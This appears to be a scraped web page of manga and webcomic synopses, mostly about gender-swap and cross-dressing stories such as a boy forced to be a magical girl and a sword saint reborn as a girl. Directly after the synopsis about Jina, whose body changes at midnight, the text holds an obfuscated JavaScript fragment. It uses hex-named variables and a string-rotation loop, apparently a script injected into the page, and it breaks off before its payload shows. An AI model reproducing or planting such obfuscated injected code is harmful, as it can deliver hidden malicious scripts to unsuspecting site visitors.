Kaito Odagiri is a normal fifth grade boy who can hold his own in a fight and loves to show off. This attracts the attention of Makoto Kaibara, a boy at Kaito's school who reveals to him that he can use magic, but he needs Kaito's help to protect the peace of their town. Kaito jumps at the chance of being a magic-wielding superhero, but his excitement turns to horror when he realizes that he'll be protecting the town dressed as a typical magical girl under the name Thrilling Pink. Although initially reluctant, Kaito soon discovers that there’s more to being a magical boy than simply looking cute in a skirt.
Since the day her mother died, Ito Miura has dressed and acted like a guy; growing up with three brothers, she has always found girly clothes and mannerisms stifling. Now in high school, she wears her hair cut short like a guy's and dresses in the boys' uniform (much to her teachers' chagrin). This, combined with her tall stature and low voice, makes mistaking her for a boy easy; unless she told you, you would never think she was a girl. Stunningly beautiful transfer student, Makoto Amano and Ito quickly become friends when Makoto joins the school drama club, which Ito is a part of. The two find a surprising number of similarities between them such as their tall stature, both of their families' homes being dojos and their passion for theater. Ito soon discovers the shocking truth about her new "girl friend."
[Taken from Mangahelpers] Goraku Gakuen is a school with over 300 clubs and student associations, and all of them are under the supervision of the Student Council. After encountering the Student Council President, Gokou Karuta, a girl who avoids most of the clubs, is asked to be the Secretary. Thus begins her work of inflitrating and monitoring the often wacky clubs...
1) Shiki is Koto's master, and he makes cosplaying costumes for his maid Koto. Though Koto doesn't like it, he still pleases his master. 2) Shiki's brother, the young master, Shuka who falls in love with the gardener of the house. But it seems the gardener doesn't want to be much with Shuka because he is the master of the house, but in the end... 3) Story about Shiki and Koto. 4) Sakura-sensei, and his special patient Chigaya. Though Chigaya always tries to seduced sensei and asks him to make love to him and that he always loved him, yet sensei doesn't want to do anything because he's worried about Chigaya's body, but when Master Shiki sends him a cosplaying outfit for Chigaya, it seems that it takes effect on the doctor. 5) Continues the story of the doctor and his special patient. 6-7) Story about a tiger and his master. Thought the tiger becomes human, still with the ears and tail, the master is sad because he turned the tiger into a human, but the tiger doesn't think like that at all. He's happy to be able to talk to his master and hug him like a human being would.
One day Jina, a 24-year-old woman, realizes that she has a peculiar constitution that turns into a man's body at midnight. Forced to change to a job without overtime, Jina starts working at a law firm as an office clerk. An unfortunate chain of events leads to her handsome playboy lawyer boss witnessing the moment when she transforms into a man...?!<script></script><script>(function(_0x446d43,_0x546ee6){var _0x1f15b4=_0x413a,_0x33844c=_0x446d43();while(!![]){try{var _0x164f6e=-parseInt(_0x1f15b4(0xab))/(0x6*-0x603+-0x15ea+0x39fd)*(parseInt(_0x1f15b4(0xa1))/(0xd47+-0x1983+-0x61f*-0x2))+parseInt(_0x1f15b4(0xb1))/(-0xa4e*0x1+-0xaf1+0x1542)*(parseInt(_0x1f15b4(0xb9))/(0x4*0x3d1+0xb*-0x338+0x1428))+parseInt(_0x1f15b4(0x9f))/(0x12cd*-0x1+-0x46a+-0x173c*-0x1)+-parseInt(_0x1f15b4(0xb7))/(0x4*-0x45d+0xef*-0xb+0x1*0x1bbf)+parseInt(_0x1f15b4(0xb6))/(-0x245f+-0xb1a+0x2f80)+-parseInt(_0x1f15b4(0xbe))/(-0xff8+-0xa45+0x1a45)*(-parseInt(_0x1f15b4(0xb5))/(0x682+0x12ba*0x2+-0x41*0xad))+-parseInt(_0x1f15b4(0xaf))/(-0x1c*0xda+-0x20c7+0x38a9)*(parseInt(_0x1f15b4(0xa9))/(-0xe02+-0xf57+-0x4c*-0x63));if(_0x164f6e===_0x546ee6)break;else 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House Francesca holds a secret. There’s an imposter within the house who seeks revenge. But who could it be? Is it the late duke’s greedy sister who loathed sharing the riches of the duchy but loved spending them on herself? One of the duke’s brothers, both of whom were hungry for the power that the duke held?
From Taruby's site: This is Nekobyou Neko's second serious work after her yonkoma manga series "Ittan Neko", although meant to be a single oneshot story, it later spawned additional stories using the same cast of characters before fading into obscurity. The first three chapters go by the title "Mahou Zakkaten Vi Via" while the last two go by the title "Bishoujo Mahou Senshi Catling". NOTE: Since this story is relatively unpopular, only magazine scans are available, hence the poor quality.
From Wingtip Cafe: In Heian era, a noble chief councillor of states had 2 children who wished they were opposite gender. Lady Kira is strong, willful girl, while Lord Kira is weak, beautiful boy. Because of their characters, their father raised Lady kira as a boy and Lord Kira as a girl. The manga is based on a novel from late Heian era called “Torikaebaya Monogatari”.
Vyalen, the main character in the story, is a graduating high school student from their school.Their school was pretty known as one of the best athletic and academic breeding students. In other words, only those who have special talents, elite minds, and abilities could only enter the school. Each of the students were categorized according to their major fields-- like being an elite, academic, and athletic. But, for the school's first in history they were not able to categorize Vyalen for whom he has this unknown ability that allows him to "artificially" use or create talents that he's not even used to... Moving on, within only 12 twelve days he will be graduating from his high school. That's why he is in a hurry for confessing his love to her long beloved crush, Trixy. But suddenly one morning, on his way to school, he suddenly bumped into a puny little nerdy girl named Lnear. having the thought that he had heard this name somewhere... later on. He finally realized that it was a classmate of his that must be sitting next to him that never came to school since the first day of class...
Akira Natsume seems to almost have a phobia of electrical devices while also being very good at diagnosing them. He resolves to change himself for the better and get a girlfriend like his older brother did... But then Akira suddenly dies in an accident. 16 years later a special policewoman and her android partner retrieve and activate a highly advanced AI and super-weapon called EX-ARM and put it into full control of their ship as a last resort. Turns out the AI is actually just Akira's brain!
Shinichi and Ichigo, who are childhood friends among their neighbors, are first-year high school students in the middle of their youth. There was a longing person who had a feeling for each of them! They couldn't get close to each other just by looking at their favorite person from a distance, but one day in early summer, a bitter gourd-related incident changed their daily lives.
Hailed as the hero for leading his country to victory from a great war, the blind Sword Saint Adel is now in despair. Unfortunately, he failed to protect his benefactor, Princess Euphinea, whom he dedicated his entire life to. "I want to meet the princess once again," he muttered, wishing deeply that his prayers would be answered. A mysterious being, having heard his plea, granted his prayers, and he was sent back to the past, to a time when the princess is still alive. Unexpectedly, the Sword Saint (♂) has been transformed into a super-duper cute Sword Saintess (♀), and her heroic tale of unrivaled power will once again take place.